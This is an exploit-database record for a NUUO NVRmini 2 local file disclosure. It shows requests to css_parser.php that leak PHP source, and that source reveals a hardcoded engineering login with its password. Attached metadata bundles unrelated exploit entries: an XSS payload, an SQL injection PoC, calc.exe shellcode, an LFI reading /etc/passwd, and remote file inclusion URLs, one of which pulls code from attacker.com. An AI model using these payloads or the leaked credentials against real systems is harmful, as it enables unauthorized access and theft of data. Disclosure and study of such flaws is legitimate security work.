ID 1337DAY-ID-25218 Type zdt Reporter LiquidWorm Modified 2016-08-06T00:00:00
Description
Exploit for php platform in category web applications
NUUO Local File Disclosure Vulnerability
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8 (NE-4160, NT-4040)
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo suffers from a file disclosure
vulnerability when input passed thru the 'css' parameter to 'css_parser.php' script
is not properly verified before being used to include files. This can be exploited
to disclose contents of files from local resources.
Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5350
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5350.php
14.01.2016
--
Request:
--------
GET http://10.0.0.17/css_parser.php?css=__nvr_dat_tool___.php HTTP/1.1
Response:
---------
<?php
include('utils.php');
header("Expires: Thu, 19 Nov 1981 08:52:00 GMT");
header("Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0");
header("Pragma: no-cache");
session_start();
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>DatTool</title>
</head>
<body>
<?php
if (isset($_POST) && isset($_POST['username']) && isset($_POST['password']))
{
if ($_POST['username'] != 'nuuoeng' || $_POST['password'] != 'qwe23622260')
{
exit(0);
}
if (isset($_POST['act']) && $_POST['act'] == 'checkdat')
{
echo '<script language="javascript">';
echo 'alert("The system will start to repair videos right after system reboot. Please go to Setting Page to reboot system manually.")';
echo '</script>';
touch(constant("FLASH_FOLDER")."/checkdat");
}
?>
<p>Click the Repair button to repair the recorded videos became black due to incorrect video format. It may take a long time to repair videos, which depends on the amount of video files.</p>
<form method="POST" action="<?php echo $_SERVER['PHP_SELF']; ?>" name="form0">
<input type="hidden" name="username" value="<?php echo $_POST['username']; ?>">
<input type="hidden" name="password" value="<?php echo htmlspecialchars( $_POST['password'] ); ?>">
<input type="hidden" name="act" value="checkdat">
<input type="submit" value="Repair" name="submit" >
</form>
<?php
}
else
{
?>
<form method="POST" action="<?php echo $_SERVER['PHP_SELF']; ?>" name="form0">
Usermame: <input type="text" size="15" name="username" value=""><br />
Password: <input type="password" size="15" name="password" value=""><br />
<input type="submit" value="Submit" name="submit" >
</form>
<?php
}
?>
</body>
</html>
============================================================================
Request:
--------
GET http://10.0.0.17/css_parser.php?css=css_parser.php HTTP/1.1
Response:
---------
<?php
if(!isset($_GET['css']))exit('/* please supply a "css" parameter */');
$filename=$_GET['css'];
if(strpos($filename,'..')!==false)exit('/* please use an absolute address for your css */');
$filename=$_SERVER['DOCUMENT_ROOT'].'/'.$filename;
if(!file_exists($filename))exit('/* referred css file does not exist */');
header('content-type:text/css');
header("Expires: ".gmdate("D, d M Y H:i:s", (time()+900)) . " GMT");
$matches=array();
$names=array();
$values=array();
$file=file_get_contents($filename);
foreach ($_GET as $key=>$value)
{
//echo "Key: $key; Value: $value <br/>\n ";
if ($key != 'css')
{
$file = str_replace($key,$value,$file);
}
//system("echo \"Key: $key; Value: $value <br/>\n \" >> $filename");
}
echo $file;
/*
foreach(array_reverse($matches[0]) as $match){
$match=preg_replace('/\s+/',' ',rtrim(ltrim($match)));
$names[]=preg_replace('/\s.*//*','',$match);
$values[]=preg_replace('/^[^\s]*\s/','',$match);
}
*/
?>
# 0day.today [2018-01-02] #
{"published": "2016-08-06T00:00:00", "id": "1337DAY-ID-25218", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["description", "published", "modified", "sourceHref", "sourceData", "title", "href"], "edition": 1, "lastseen": "2016-04-20T01:50:48", "bulletin": {"published": "2016-04-14T00:00:00", "id": "1337DAY-ID-25218", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 4.4, "modified": "2016-04-20T01:50:48"}}, "hash": "8b169529c1ea7200816a5f6e43b102668de7856b3ee67d9e4e32740a3b74d9c3", "description": "OpenWGA Content Manager version 7.1.9 suffers from a cross site scripting vulnerability when input passed via the User-Agent HTTP header is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.", "type": "zdt", "lastseen": "2016-04-20T01:50:48", "edition": 1, "title": "OpenWGA Content Manager 7.1.9 User-Agent HTTP Header XSS Vulnerability", "href": "http://0day.today/exploit/description/25218", "modified": "2016-04-14T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/25218", "references": [], "reporter": "LiquidWorm", "sourceData": "OpenWGA Content Manager 7.1.9 User-Agent HTTP Header XSS Vulnerability\r\n\r\n\r\nVendor: Innovation Gate GmbH\r\nProduct web page: https://www.openwga.com\r\nAffected version: OpenWGA Content Manager 7.1.9 (Build 230)\r\n OpenWGA Admin Client 7.1.7 (Build 82)\r\n OpenWGA Server 7.1.9 Maintenance Release (Build 642)\r\n\r\nSummary: OpenWGA is an advanced open source java based enterprise CMS\r\nplatform featuring real WYSIWYG, a state of the art CMS IDE and more.\r\n\r\nDesc: OpenWGA suffers from a cross-site scripting vulnerability when\r\ninput passed via the User-Agent HTTP header is not properly sanitized\r\nbefore being returned to the user. This can be exploited to execute\r\narbitrary HTML and script code in a user's browser session in context\r\nof an affected site.\r\n\r\nTested on: Apache/2.2.14 (Ubuntu)\r\n Apache Tomcat/6.0.41\r\n Apache-Coyote/1.1\r\n\r\n--\r\n\r\n\r\nRequest:\r\n--------\r\n\r\nGET /plugin-contentmanager HTTP/1.1\r\nHost: localhost:8080\r\nAccept: */*\r\nAccept-Language: en\r\nUser-Agent: <script>alert(1)</script>\r\nConnection: close\r\n\r\n\r\nResponse:\r\n---------\r\n\r\nHTTP/1.1 200 OK\r\nServer: Apache-Coyote/1.1\r\nSet-Cookie: WGLastRedirectHex=; Path=/; Max-Age=0; HttpOnly\r\nPragma: No-Cache\r\nCache-Control: No-Cache\r\nContent-Type: text/html;charset=UTF-8\r\nDate: Tue, 23 Feb 2016 14:02:49 GMT\r\nConnection: close\r\nContent-Length: 1902\r\n\r\n\r\n<html>\r\n<head>\r\n<title>browser not supported: OpenWGA\u2122 Content Manager Version 7.1.9 Build 230</title>\r\n<meta name=\"generator\" content=\"OpenWGA... Server 7 'Wolf' Platform\">\r\n\r\n<span style=\"font-weight:bold\"><script>alert(1)</script></span>\r\n\r\n---\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "7285786dae6d90dc7a88d5a9ee01d650", "key": "sourceData"}, {"hash": "085b94284d43bdb03b4bfd3ce2486454", "key": "description"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "1139d22e83d0f3d97cdbe8b1249e2c9d", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "720a71c9a4d67e5598162d7e42fbc6b2", "key": "sourceHref"}, {"hash": "72437e7b05aab12a2a63f521048817dc", "key": "title"}, {"hash": "ccc017a1217287c0cb486c39648ceaab", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "1139d22e83d0f3d97cdbe8b1249e2c9d", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "91aad38014ecd6c9585176f5bacd2246", "key": "reporter"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "1068580c4a04a1260eb96d59202de5b2ff024e94021e87e9687d20e22d1b6ef2", "enchantments": {"score": {"value": -0.7, "vector": "NONE", "modified": "2018-01-02T17:10:33"}, "dependencies": {"references": [{"type": "zeroscience", "idList": ["ZSL-2016-5350"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:25218", "SECURITYVULNS:VULN:11274"]}, {"type": "zdt", "idList": ["1337DAY-ID-5350", "1337DAY-ID-4160", "1337DAY-ID-1902", "1337DAY-ID-642"]}], "modified": "2018-01-02T17:10:33"}, "vulnersScore": -0.7}, "type": "zdt", "lastseen": "2018-01-02T17:10:33", "edition": 2, "title": "NUUO NVRmini 2 3.0.8 - Local File Disclosure", "href": "https://0day.today/exploit/description/25218", "modified": "2016-08-06T00:00:00", "bulletinFamily": "exploit", "viewCount": 8, "cvelist": [], "sourceHref": "https://0day.today/exploit/25218", "references": [], "reporter": "LiquidWorm", "sourceData": "NUUO Local File Disclosure Vulnerability\r\n \r\n \r\nVendor: NUUO Inc.\r\nProduct web page: http://www.nuuo.com\r\nAffected version: <=3.0.8 (NE-4160, NT-4040)\r\n \r\nSummary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS\r\nfunctionality. Setup is simple and easy, with automatic port forwarding\r\nsettings built in. NVRmini 2 supports POS integration, making this the perfect\r\nsolution for small retail chain stores. NVRmini 2 also comes full equipped as\r\na NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping\r\nand RAID functions for data protection. Choose NVR and know that your valuable video\r\ndata is safe, always.\r\n \r\nDesc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo suffers from a file disclosure\r\nvulnerability when input passed thru the 'css' parameter to 'css_parser.php' script\r\nis not properly verified before being used to include files. This can be exploited\r\nto disclose contents of files from local resources.\r\n \r\n \r\nTested on: GNU/Linux 3.0.8 (armv7l)\r\n GNU/Linux 2.6.31.8 (armv5tel)\r\n lighttpd/1.4.28\r\n PHP/5.5.3\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2016-5350\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5350.php\r\n \r\n \r\n14.01.2016\r\n \r\n--\r\n \r\n \r\nRequest:\r\n--------\r\nGET http://10.0.0.17/css_parser.php?css=__nvr_dat_tool___.php HTTP/1.1\r\n \r\n \r\nResponse:\r\n---------\r\n \r\n<?php\r\ninclude('utils.php');\r\nheader(\"Expires: Thu, 19 Nov 1981 08:52:00 GMT\");\r\nheader(\"Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\");\r\nheader(\"Pragma: no-cache\");\r\n \r\nsession_start();\r\n?>\r\n<html>\r\n<head>\r\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\r\n <title>DatTool</title>\r\n</head>\r\n<body>\r\n<?php\r\nif (isset($_POST) && isset($_POST['username']) && isset($_POST['password']))\r\n{\r\n if ($_POST['username'] != 'nuuoeng' || $_POST['password'] != 'qwe23622260')\r\n {\r\n exit(0);\r\n }\r\n \r\n if (isset($_POST['act']) && $_POST['act'] == 'checkdat')\r\n {\r\n echo '<script language=\"javascript\">';\r\n echo 'alert(\"The system will start to repair videos right after system reboot. Please go to Setting Page to reboot system manually.\")';\r\n echo '</script>';\r\n touch(constant(\"FLASH_FOLDER\").\"/checkdat\");\r\n }\r\n?>\r\n \r\n<p>Click the Repair button to repair the recorded videos became black due to incorrect video format. It may take a long time to repair videos, which depends on the amount of video files.</p>\r\n<form method=\"POST\" action=\"<?php echo $_SERVER['PHP_SELF']; ?>\" name=\"form0\">\r\n<input type=\"hidden\" name=\"username\" value=\"<?php echo $_POST['username']; ?>\">\r\n<input type=\"hidden\" name=\"password\" value=\"<?php echo htmlspecialchars( $_POST['password'] ); ?>\">\r\n<input type=\"hidden\" name=\"act\" value=\"checkdat\">\r\n<input type=\"submit\" value=\"Repair\" name=\"submit\" >\r\n</form>\r\n \r\n<?php\r\n}\r\nelse\r\n{\r\n?>\r\n<form method=\"POST\" action=\"<?php echo $_SERVER['PHP_SELF']; ?>\" name=\"form0\">\r\nUsermame: <input type=\"text\" size=\"15\" name=\"username\" value=\"\"><br />\r\nPassword: <input type=\"password\" size=\"15\" name=\"password\" value=\"\"><br />\r\n<input type=\"submit\" value=\"Submit\" name=\"submit\" >\r\n</form>\r\n<?php\r\n}\r\n \r\n?>\r\n \r\n</body>\r\n</html>\r\n \r\n \r\n============================================================================\r\n \r\nRequest:\r\n--------\r\n \r\nGET http://10.0.0.17/css_parser.php?css=css_parser.php HTTP/1.1\r\n \r\n \r\nResponse:\r\n---------\r\n \r\n<?php\r\n \r\nif(!isset($_GET['css']))exit('/* please supply a \"css\" parameter */');\r\n$filename=$_GET['css'];\r\n \r\nif(strpos($filename,'..')!==false)exit('/* please use an absolute address for your css */');\r\n$filename=$_SERVER['DOCUMENT_ROOT'].'/'.$filename;\r\nif(!file_exists($filename))exit('/* referred css file does not exist */');\r\n \r\nheader('content-type:text/css');\r\nheader(\"Expires: \".gmdate(\"D, d M Y H:i:s\", (time()+900)) . \" GMT\");\r\n \r\n$matches=array();\r\n$names=array();\r\n$values=array();\r\n$file=file_get_contents($filename);\r\nforeach ($_GET as $key=>$value) \r\n{\r\n //echo \"Key: $key; Value: $value <br/>\\n \";\r\n if ($key != 'css')\r\n {\r\n $file = str_replace($key,$value,$file);\r\n }\r\n //system(\"echo \\\"Key: $key; Value: $value <br/>\\n \\\" >> $filename\");\r\n} \r\n \r\necho $file;\r\n \r\n/*\r\nforeach(array_reverse($matches[0]) as $match){\r\n $match=preg_replace('/\\s+/',' ',rtrim(ltrim($match)));\r\n $names[]=preg_replace('/\\s.*//*','',$match);\r\n $values[]=preg_replace('/^[^\\s]*\\s/','',$match);\r\n}\r\n*/\r\n \r\n?>\n\n# 0day.today [2018-01-02] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "b487e33d78006e4227140128c6deb3d9", "key": "href"}, {"hash": "67673263860bbeff909217b6feae0fc5", "key": "modified"}, {"hash": "67673263860bbeff909217b6feae0fc5", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "91aad38014ecd6c9585176f5bacd2246", "key": "reporter"}, {"hash": "7d486e32b6b32d3307df8b477808f6f3", "key": "sourceData"}, {"hash": "357e0a40c7e5684c4fdac9b773dc3a05", "key": "sourceHref"}, {"hash": "9765631df43f8dc50c9d26cedcf19287", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"zeroscience": [{"lastseen": "2019-11-11T16:11:41", "bulletinFamily": "exploit", "description": "Title: NUUO Local File Disclosure Vulnerability \nAdvisory ID: [ZSL-2016-5350](<ZSL-2016-5350.php>) \nType: Local/Remote \nImpact: Exposure of System Information, Exposure of Sensitive Information \nRisk: (3/5) \nRelease Date: 06.08.2016 \n\n\n##### Summary\n\nNUUO NVRmini 2 is the lightweight, portable NVR solution with NAS functionality. Setup is simple and easy, with automatic port forwarding settings built in. NVRmini 2 supports POS integration, making this the perfect solution for small retail chain stores. NVRmini 2 also comes full equipped as a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping and RAID functions for data protection. Choose NVR and know that your valuable video data is safe, always. \n\n##### Description\n\nNUUO NVRmini, NVRmini2, Crystal and NVRSolo suffers from a file disclosure vulnerability when input passed thru the 'css' parameter to 'css_parser.php' script is not properly verified before being used to include files. This can be exploited to disclose contents of files from local resources. \n\n##### Vendor\n\nNUUO Inc. - <http://www.nuuo.com>\n\n##### Affected Version\n\n<=3.0.8 (NE-4160, NT-4040) \n\n##### Tested On\n\nGNU/Linux 3.0.8 (armv7l) \nGNU/Linux 2.6.31.8 (armv5tel) \nlighttpd/1.4.28 \nPHP/5.5.3 \n\n##### Vendor Status\n\n[14.01.2016] Vulnerability discovered. \n[01.02.2016] Vendor contacted. \n[02.02.2016] Vendor responds asking explanation. \n[03.02.2016] Explained to vendor about the issues and risk. \n[04.02.2016] Vendor ignores with confusion. \n[10.02.2016] Sent another e-mail probe to several accounts for respond. \n[16.02.2016] No response from the vendor. \n[16.04.2016] Final try to get communication from the vendor and report issues. \n[05.08.2016] No response from the vendor. \n[06.08.2016] Public security advisory released. \n\n##### PoC\n\n[nuuo_lfd.txt](<../../codes/nuuo_lfd.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://www.exploit-db.com/exploits/40211/> \n[2] <https://cxsecurity.com/issue/WLB-2016080065> \n[3] <https://packetstormsecurity.com/files/138222>\n\n##### Changelog\n\n[06.08.2016] - Initial release \n[09.08.2016] - Added reference [1], [2] and [3] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2016-08-06T00:00:00", "published": "2016-08-06T00:00:00", "id": "ZSL-2016-5350", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5350.php", "title": "NUUO Local File Disclosure Vulnerability", "type": "zeroscience", "sourceData": "<html><head><title>403 Nothing to see.</title>\n<link rel=\"Shortcut Icon\" href=\"favicon.ico\" type=\"image/x-icon\">\n<style type=\"text/css\">\n<!--\nbody {\n\tbackground-color: #000;\n}\nbody,td,th {\n\tfont-family: Verdana, Geneva, sans-serif;\n}\na:link {\n\tcolor: #008FEF;\n\ttext-decoration: none;\n}\na:visited {\n\tcolor: #008FEF;\n\ttext-decoration: none;\n}\na:hover {\n\ttext-decoration: underline;\n\tcolor: #666;\n}\na:active {\n\ttext-decoration: none;\n}\n-->\n</style>\n</head>\n<body bgcolor=black>\n<center>\n<font color=\"#7E88A3\" size=\"2\">\n<br /><br />\n<h1>403 Nothing to see.</h1>\n\nYou do not have the powah for this request /403.shtml<br /><br />\n<font size=\"2\"><a href=\"https://www.zeroscience.mk\">https://www.zeroscience.mk</a></font>\n</font></center>\n</body></html>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/nuuo_lfd.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:38", "bulletinFamily": "software", "description": "Vulnerability ID: HTB22709\r\nReference: http://www.htbridge.ch/advisory/sql_injection_in_enano_cms.html\r\nProduct: Enano CMS\r\nVendor: enanocms.org ( http://enanocms.org/ ) \r\nVulnerable Version: 1.1.7pl1\r\nVendor Notification: 16 November 2010 \r\nVulnerability Type: SQL Injection\r\nStatus: Fixed by Vendor\r\nRisk level: High \r\nCredit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) \r\n\r\nVulnerability Details:\r\nThe vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in email variable.\r\nAttacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.\r\n\r\nThe following PoC is available:\r\n\r\nStep1.\r\nRegister new user with email: "any@email.com'SQL_CODE"\r\n\r\nStep2.\r\nLog in with new login and password.\r\nSolution: Upgrade to the most recent version", "modified": "2010-12-01T00:00:00", "published": "2010-12-01T00:00:00", "id": "SECURITYVULNS:DOC:25218", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25218", "title": "SQL Injection in Enano CMS", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:39", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2010-12-01T00:00:00", "published": "2010-12-01T00:00:00", "id": "SECURITYVULNS:VULN:11274", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11274", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-03-28T05:24:06", "bulletinFamily": "exploit", "description": "Exploit for win32 platform in category shellcode", "modified": "2010-03-12T00:00:00", "published": "2010-03-12T00:00:00", "id": "1337DAY-ID-11274", "href": "https://0day.today/exploit/description/11274", "type": "zdt", "title": "win32/xp sp3 (Ita) calc.exe shellcode 36 bytes", "sourceData": "==============================================\r\nwin32/xp sp3 (Ita) calc.exe shellcode 36 bytes\r\n==============================================\r\n\r\n/*\r\nTitle: Windows XP Professional SP2 ita calc.exe shellcode 36 bytes\r\nType: Shellcode\r\nAuthor: Stoke\r\nPlatform: win32\r\nTested on: Windows XP Professional SP2 ita\r\n*/\r\n \r\n#include <stdio.h>\r\n#include <string.h>\r\n \r\nint main() {\r\nchar shell[] = \"\\xeb\\x16\\x5b\\x31\\xc0\\x50\\x53\\xbb\"\r\n\"\\x8d\\x15\\x86\\x7c\\xff\\xd3\\x31\\xc0\"\r\n\"\\x50\\xbb\\xea\\xcd\\x81\\x7c\\xff\\xd3\"\r\n\"\\xe8\\xe5\\xff\\xff\\xff\\x63\\x61\\x6c\"\r\n\"\\x63\\x2e\\x65\\x78\\x65\";\r\nprintf(\"Shellcode lenght %d\\n\", strlen(shell));\r\ngetchar();\r\n((void (*)()) shell)();\r\nreturn 0;\r\n}\r\n\r\n\r\n\n# 0day.today [2018-03-28] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/11274"}, {"lastseen": "2018-01-09T15:09:34", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-06-11T00:00:00", "published": "2009-06-11T00:00:00", "id": "1337DAY-ID-5350", "href": "https://0day.today/exploit/description/5350", "type": "zdt", "title": "phpWebThings <= 1.5.2 (help.php module) Local File Inclusion Vuln", "sourceData": "=================================================================\r\nphpWebThings <= 1.5.2 (help.php module) Local File Inclusion Vuln\r\n=================================================================\r\n\r\n\r\n----------------------------------------------------------------------------------------------------\r\n\r\n Name : phpwebthings <= 1.5.2\r\n Site : http://sourceforge.net/projects/phpwebthings/\r\n\r\n Down : http://sourceforge.net/project/downloading.php?group_id=19103&filename=phpwebthings_1_5_2.zip&a=46042396\r\n\r\n\r\n----------------------------------------------------------------------------------------------------\r\n\r\n \r\n Found By : br0ly\r\n Made in : Brasil\r\n\r\n----------------------------------------------------------------------------------------------------\r\n\r\n\r\n Description:\r\n\r\n Bug : Local File Inclusion\r\n \r\n Look this: \r\n\r\n <?php theme_draw_centerbox_open(\"Help\");\r\n if (isset($_GET[\"module\"])) include(\"modules/{$_GET[\"module\"]}/lang/help_{$cfg[\"core\"][\"lang\"]}.php\"); <-- Vul \r\n\r\n else include(\"lang/help_{$cfg[\"core\"][\"lang\"]}.php\");\r\n\r\n\r\n\r\n If magic_quotes_gpc=off --> LFI; \r\n\r\n\r\n\r\n----------------------------------------------------------------------------------------------------\r\n\r\n\r\n P0c:\r\n \r\n LFI:http://localhost/Scripts/phpwebthings_1_5_2/help?module=../../../../../../../../../../../../etc/passwd%00\r\n\r\n\r\n\r\n OBS: need register_globals=on;\r\n\r\n----------------------------------------------------------------------------------------------------\r\n\r\n\r\n\n# 0day.today [2018-01-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/5350"}, {"lastseen": "2018-04-09T17:40:47", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-11-11T00:00:00", "published": "2008-11-11T00:00:00", "id": "1337DAY-ID-4160", "href": "https://0day.today/exploit/description/4160", "type": "zdt", "title": "Joomla Component Simple RSS Reader 1.0 RFI Vulnerability", "sourceData": "========================================================\r\nJoomla Component Simple RSS Reader 1.0 RFI Vulnerability\r\n========================================================\r\n\r\n\r\n================================================================================================================================\r\n\r\n\r\n [o] Simple RSS Reader Component 1.0 Remote File Inclusion Vulnerability\r\n\r\n Software : com_rssreader version 1.0\r\n Vendor : http://www.joomlashop.dk/\r\n Download : http://extensions.joomlashop.dk/index.php?option=com_docman&task=cat_view&gid=16&Itemid=47\r\n Author : NoGe\r\n\r\n================================================================================================================================\r\n\r\n\r\n [o] Vulnerable file\r\n\r\n administrator/components/com_rssreader/admin.rssreader.php\r\n\r\n include( \"$mosConfig_live_site/components/com_rssreader/about.html\" );\r\n\r\n\r\n\r\n [o] Exploit\r\n\r\n http://localhost/[path]/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=[evilcode]\r\n\r\n\r\n================================================================================================================================\r\n\r\n\r\n\r\n\r\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/4160"}, {"lastseen": "2018-04-10T05:38:52", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2007-05-23T00:00:00", "published": "2007-05-23T00:00:00", "id": "1337DAY-ID-1902", "href": "https://0day.today/exploit/description/1902", "type": "zdt", "title": "Scallywag (template.php path) Remote File Inclusion Vulnerabilities", "sourceData": "===================================================================\r\nScallywag (template.php path) Remote File Inclusion Vulnerabilities\r\n===================================================================\r\n\r\n\r\n\r\n##############################################################################################\r\n#Scallywag <= Remote File Inclusion Vulnerability #\r\n# # \r\n#Dork:\"Powered by Scallywag\" #\r\n# #\r\n# # \r\n##############################################################################################\r\n#Vuln Code # \r\n# # \r\n#ERROR1:skin/dark/template.php # \r\n# # \r\n# <?php # \r\n# include(\"$path/source/top.txt\"); <<< RFI CODE # \r\n# # \r\n# # \r\n#BUG1: # \r\n# # \r\n#Example1:http://victim.com/path/skin/dark/template.php?path=[[Sh3LL Script]] #\r\n############################################################################################## \r\n# # \r\n#ERROR2:skin/gold/template.php # \r\n# # \r\n# <?php # \r\n# include(\"$path/source/top.txt\"); <<< RFI CODE # \r\n# # \r\n# # \r\n#BUG2: # \r\n# # \r\n#Example1:http://victim.com/path/skin/gold/template.php?path=[[Sh3LL Script]] #\r\n##############################################################################################\r\n# # \r\n#ERROR3:skin/original/template.php # \r\n# # \r\n# <?php # \r\n# include(\"$path/source/top.txt\"); <<< RFI CODE #\r\n# # \r\n# # \r\n#BUG3: # \r\n# # \r\n#Example1: http://victim.com/path/skin/original/template.php?path=[[Sh3LL Script]] #\r\n############################################################################################## # \r\n##############################################################################################\r\n##############################################################################################\r\n\r\n\r\n\n# 0day.today [2018-04-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/1902"}, {"lastseen": "2018-04-14T22:01:26", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2006-08-07T00:00:00", "published": "2006-08-07T00:00:00", "id": "1337DAY-ID-642", "href": "https://0day.today/exploit/description/642", "type": "zdt", "title": "PHP Live Helper <= 2.0 (abs_path) Remote File Inclusion Vulnerability", "sourceData": "=====================================================================\r\nPHP Live Helper <= 2.0 (abs_path) Remote File Inclusion Vulnerability\r\n=====================================================================\r\n\r\n\r\n\r\n\\_ _____/\\_ ___ \\ / | \\\\_____ \\\r\n | __)_ / \\ \\// ~ \\/ | \\\r\n | \\\\ \\___\\ Y / | \\\r\n/_______ / \\______ /\\___|_ /\\_______ /\r\n \\/ \\/ \\/ \\/ .OR.ID\r\nECHO_ADV_43$2006\r\n\r\n------------------------------------------------------------------------------\r\n[ECHO_ADV_43$2006] PHP Live Helper <= 2.0 (abs_path) Remote File Inclusion\r\n------------------------------------------------------------------------------\r\n\r\nAuthor\t\t: Ahmad Maulana a.k.a Matdhule\r\nDate Found\t: July, 02nd 2006\r\nLocation\t: Indonesia, Jakarta\r\nCritical Lvl\t: Highly critical\r\nImpact\t\t: System access\r\nWhere\t\t: From Remote\r\n---------------------------------------------------------------------------\r\n\r\nAffected software description:\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nPHP Live Helper\r\n\r\nApplication\t: PHP Live Helper\r\nversion\t\t: Latest version [2.0]\r\nURL\t\t: http://www.turnkeywebtools.com/phplivehelper\r\n\r\n---------------------------------------------------------------------------\r\n\r\nVulnerability:\r\n~~~~~~~~~~~~~~\r\n\r\n-----------------------global.php----------------------\r\n....\r\n<?PHP\r\n/*\r\n global.php - 05/30/2006 - 5:27pm PST - 2.0\r\n \r\n PHP Live Helper\r\n http://www.turnkeywebtools.com/phplivehelper/\r\n \r\n Copyright (c) 2001-2006 Turnkey Web Tools, Inc.\r\n*/\r\n\r\ndefine('PLH_SESSION_START', '1');\r\n\r\n////////////////////////////\r\n// Load Class & Secure Files\r\n////////////////////////////\r\n\r\nrequire_once $abs_path.\"/libsecure.php\";\r\ninclude_once $abs_path.\"/include/class.browser.php\";\r\n...\r\n----------------------------------------------------------\r\n\r\nInput passed to the \"abs_path\" parameter in global.php is not\r\nproperly verified before being used. This can be exploited to execute\r\narbitrary PHP code by including files from local or external\r\nresources.\r\n\r\nProof Of Concept:\r\n~~~~~~~~~~~~~~~\r\n\r\nhttp://target.com/[phplivehelper_path]/global.php?abs_path=http://attacker.com/inject.txt?\r\n\r\nSolution:\r\n~~~~~~~\r\n- Sanitize variable $abs_path on global.php.\r\n\r\nNotification:\r\n~~~~~~~~~~\r\n\r\nI've been contacting the web/software administrator to tell about this hole in his system, \r\nbut instead of giving a nice response, he replied so rudely and arrogantly. \r\nI recommend not to use this product for your own sake.\r\n\r\n---------------------------------------------------------------------------\r\nShoutz:\r\n~~~\r\n~ solpot a.k.a chris, J4mbi H4ck3r thx for the hacking 